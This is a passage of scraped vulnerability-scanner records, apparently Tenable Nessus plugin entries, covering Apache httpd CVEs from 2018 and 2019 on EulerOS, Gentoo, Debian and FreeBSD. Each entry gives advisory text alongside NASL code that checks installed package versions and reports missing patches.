expiry time is loaded when the session is decoded.(CVE-2018-17199)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.(CVE-2019-10082)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with 'H2PushResource', could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.(CVE-2019-10081)\n\n - Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire.\n The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.(CVE-2019-10097)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-04-02T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.6.0 : httpd (EulerOS-SA-2020-1359)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17199", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10097", "CVE-2019-9517"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-filesystem", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2020-1359.NASL", "href": "https://www.tenable.com/plugins/nessus/135146", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135146);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-17199\",\n \"CVE-2019-10081\",\n \"CVE-2019-10082\",\n \"CVE-2019-10097\",\n \"CVE-2019-9517\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.6.0 : httpd (EulerOS-SA-2020-1359)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the httpd packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In Apache HTTP Server 2.4 release 2.4.37 and prior,\n mod_session checks the session expiry time before\n decoding the session. This causes session expiry time\n to be ignored for mod_session_cookie sessions since the\n expiry time is loaded when the session is\n decoded.(CVE-2018-17199)\n\n - In Apache HTTP Server 2.4.18-2.4.39, using fuzzed\n network input, the http/2 session handling could be\n made to read memory after being freed, during\n connection shutdown.(CVE-2019-10082)\n\n - HTTP/2 (2.4.20 through 2.4.39) very early pushes, for\n example configured with 'H2PushResource', could lead to\n an overwrite of memory in the pushing request's pool,\n leading to crashes. The memory copied is that of the\n configured push link header values, not data supplied\n by the client.(CVE-2019-10081)\n\n - Some HTTP/2 implementations are vulnerable to\n unconstrained interal data buffering, potentially\n leading to a denial of service. The attacker opens the\n HTTP/2 window so the peer can send without constraint\n however, they leave the TCP window closed so the peer\n cannot actually write (many of) the bytes on the wire.\n The attacker then sends a stream of requests for a\n large response object. Depending on how the servers\n queue the responses, this can consume excess memory,\n CPU, or both.(CVE-2019-9517)\n\n - In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip\n was configured to use a trusted intermediary proxy\n server using the 'PROXY' protocol, a specially crafted\n PROXY header could trigger a stack buffer overflow or\n NULL pointer deference. This vulnerability could only\n be triggered by a trusted proxy and not by untrusted\n HTTP clients.(CVE-2019-10097)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1359\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1a96a13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-filesystem-2.4.34-8.h11.eulerosv2r8\",\n \"httpd-tools-2.4.34-8.h11.eulerosv2r8\",\n \"mod_ssl-2.4.34-8.h11.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:51:03", "description": "The remote host is affected by the vulnerability described in GLSA-201909-04 (Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "GLSA-201909-04 : Apache: Multiple vulnerabilities (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:apache", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201909-04.NASL", "href": "https://www.tenable.com/plugins/nessus/128593", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201909-04.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128593);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"GLSA\", value:\"201909-04\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"GLSA-201909-04 : Apache: Multiple vulnerabilities (Internal Data Buffering)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201909-04\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201909-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/apache-2.4.41'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 2.4.41\"), vulnerable:make_list(\"lt 2.4.41\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-01T16:36:12", "description": "Several vulnerabilities have been found in the Apache HTTPD server.\n\n - CVE-2019-9517 Jonathan Looney reported that a malicious client could perform a denial of service attack (exhausting h2 workers) by flooding a connection with requests and basically never reading responses on the TCP connection.\n\n - CVE-2019-10081 Craig Young reported that HTTP/2 PUSHes could lead to an overwrite of memory in the pushing request's pool, leading to crashes.\n\n - CVE-2019-10082 Craig Young reported that the HTTP/2 session handling could be made to read memory after being freed, during connection shutdown.\n\n - CVE-2019-10092 Matei 'Mal' Badanoiu reported a limited cross-site scripting vulnerability in the mod_proxy error page.\n\n - CVE-2019-10097 Daniel McCarney reported that when mod_remoteip was configured to use a trusted intermediary proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients. The issue does not affect the stretch release.\n\n - CVE-2019-10098 Yukitsugu Sasaki reported a potential open redirect vulnerability in the mod_rewrite module.", "cvss3": {}, "published": "2019-08-27T00:00:00", "type": "nessus", "title": "Debian DSA-4509-1 : apache2 - security update (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4509.NASL", "href": "https://www.tenable.com/plugins/nessus/128182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4509. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128182);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"DSA\", value:\"4509\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Debian DSA-4509-1 : apache2 - security update (Internal Data Buffering)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been found in the Apache HTTPD server.\n\n - CVE-2019-9517\n Jonathan Looney reported that a malicious client could\n perform a denial of service attack (exhausting h2\n workers) by flooding a connection with requests and\n basically never reading responses on the TCP connection.\n\n - CVE-2019-10081\n Craig Young reported that HTTP/2 PUSHes could lead to an\n overwrite of memory in the pushing request's pool,\n leading to crashes.\n\n - CVE-2019-10082\n Craig Young reported that the HTTP/2 session handling\n could be made to read memory after being freed, during\n connection shutdown.\n\n - CVE-2019-10092\n Matei 'Mal' Badanoiu reported a limited cross-site\n scripting vulnerability in the mod_proxy error page.\n\n - CVE-2019-10097\n Daniel McCarney reported that when mod_remoteip was\n configured to use a trusted intermediary proxy server\n using the 'PROXY' protocol, a specially crafted PROXY\n header could trigger a stack buffer overflow or NULL\n pointer deference. This vulnerability could only be\n triggered by a trusted proxy and not by untrusted HTTP\n clients. The issue does not affect the stretch release.\n\n - CVE-2019-10098\n Yukitsugu Sasaki reported a potential open redirect\n vulnerability in the mod_rewrite module.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-9517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-10081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-10082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-10092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-10097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-10098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4509\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 2.4.25-3+deb9u8.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 2.4.38-3+deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"apache2\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-bin\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-data\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-dev\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-doc\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-ssl-dev\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-suexec-custom\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-suexec-pristine\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"apache2-utils\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libapache2-mod-md\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libapache2-mod-proxy-uwsgi\", reference:\"2.4.38-3+deb10u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-bin\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-data\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-dbg\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-dev\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-doc\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-ssl-dev\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-suexec-custom\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-suexec-pristine\", reference:\"2.4.25-3+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"apache2-utils\", reference:\"2.4.25-3+deb9u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:47:42", "description": "SO-AND-SO reports : SECURITY: CVE-2019-10081 mod_http2: HTTP/2 very early pushes, for example configured with 'H2PushResource', could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client. SECURITY: CVE-2019-9517 mod_http2: a malicious client could perform a DoS attack by flooding a connection with requests and basically never reading responses on the TCP connection. Depending on h2 worker dimensioning, it was possible to block those with relatively few connections. SECURITY:\nCVE-2019-10098 rewrite, core: Set PCRE_DOTALL flag by default to avoid unpredictable matches and substitutions with encoded line break characters. SECURITY: CVE-2019-10092 Remove HTML-escaped URLs from canned error responses to prevent misleading text/links being displayed via crafted links. SECURITY: CVE-2019-10097 mod_remoteip:\nFix stack-based buffer overflow and NULL pointer deference when reading the PROXY protocol header. CVE-2019-10082 mod_http2: Using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.", "cvss3": {}, "published": "2019-08-20T00:00:00", "type": "nessus", "title": "FreeBSD : Apache -- Multiple vulnerabilities (caf545f2-c0d9-11e9-9051-4c72b94353b5) (Internal Data Buffering)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CAF545F2C0D911E990514C72B94353B5.NASL", "href": "https://www.tenable.com/plugins/nessus/127951", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127951);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"FreeBSD : Apache -- Multiple vulnerabilities (caf545f2-c0d9-11e9-9051-4c72b94353b5) (Internal Data Buffering)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"SO-AND-SO reports : SECURITY: CVE-2019-10081 mod_http2: HTTP/2 very\nearly pushes, for example configured with 'H2PushResource', could lead\nto an overwrite of memory in the pushing request's pool, leading to\ncrashes. The memory copied is that of the configured push link header\nvalues, not data supplied by the client. SECURITY: CVE-2019-9517\nmod_http2: a malicious client could perform a DoS attack by flooding a\nconnection with requests and basically never reading responses on the\nTCP connection. Depending on h2 worker dimensioning, it was possible\nto block those with relatively few connections. SECURITY:\nCVE-2019-10098 rewrite, core: Set PCRE_DOTALL flag by default to avoid\nunpredictable matches and substitutions with encoded line break\ncharacters. SECURITY: CVE-2019-10092 Remove HTML-escaped URLs from\ncanned error responses to prevent misleading text/links being\ndisplayed via crafted links. SECURITY: CVE-2019-10097 mod_remoteip:\nFix stack-based buffer overflow and NULL pointer deference when reading the\nPROXY protocol header. CVE-2019-10082 mod_http2: Using fuzzed network\ninput, the http/2 session handling could be made to read memory after\nbeing freed, during connection shutdown.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.4\"\n );\n # https://vuxml.freebsd.org/freebsd/caf545f2-c0d9-11e9-9051-4c72b94353b5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d60028a5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10082\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n 